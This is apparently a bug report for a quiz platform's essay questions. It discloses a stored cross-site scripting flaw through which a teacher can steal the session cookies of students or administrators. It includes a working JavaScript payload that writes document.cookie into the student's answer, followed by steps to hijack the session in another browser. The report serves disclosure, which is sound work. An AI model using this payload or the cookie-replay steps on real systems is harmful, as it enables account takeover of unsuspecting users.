By default, teacher can insert any javascript code into the Question text field.
So a teacher can interact and get private informations from students (or anyone who answer the question, even an administrator).

Reproduce the bug

1. Create a essay
2. Fill question text field with in html mode :

   A basic question text.

   <script>

   <!--

   ( function(){

   window.addEventListener('load', function() {

   var next = document.getElementById('responseform').next;

   if ('undefined' != typeof next) {

   next.addEventListener('click', function (event) {

   document.getElementsByTagName('textarea')[0].value += "<a href='" + document.cookie + "'> </a>";

   });

   }

   })

   } )();

   -->

   </script>

3. Create a Quiz containing the question.
4. Answer the question with any user.
5. Inspect answer and find stolenCookie in href attribute of the empty a tag.
6. Type following code in console of any other browser :

   document.cookie = stolenCookie;

7. Refresh the page.
8. Your are now logged with victim's session.

More informations

Done with a https connexion and atto editor (probably work with other if we adjust injected code).